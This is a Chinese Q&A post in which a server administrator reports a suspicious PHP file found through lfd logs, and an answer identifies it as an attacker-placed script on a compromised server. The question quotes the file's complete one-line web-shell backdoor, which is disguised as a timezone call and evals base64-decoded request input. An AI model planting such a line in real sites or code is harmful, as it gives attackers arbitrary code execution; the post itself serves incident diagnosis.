可能重复:
我该如何处理受到感染的服务器?
检查 lfd.log 并注意到一个脚本的阻止日志:
Jan 10 22:01:36 xxx lfd[871]: *User Processing* PID:27023 Kill:0 User:xxxx Time:610472 EXE:/usr/bin/php CMD:/usr/bin/php /home/xxxx/public_html/fonts/article5.class.inc.php
看起来脚本正在尝试执行 /usr/bin/php,但是当我看到代码时,它是一个简单的单行文件
<?php
function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
有没有人有类似的经历?有什么方法可以查看导致 /usr/bin/php 调用的原因吗?日志显示该脚本是通过 POST 调用的。
答案1
有人在此目录中放置了攻击脚本。如果eval在您的 PHP 配置中没有停用,这将允许攻击者执行与请求一起发送的任意 PHP 代码。
该脚本通过简单的 HTTP POST 请求调用。
您应该考虑您的系统已被入侵,并尝试找出攻击者如何放置该脚本。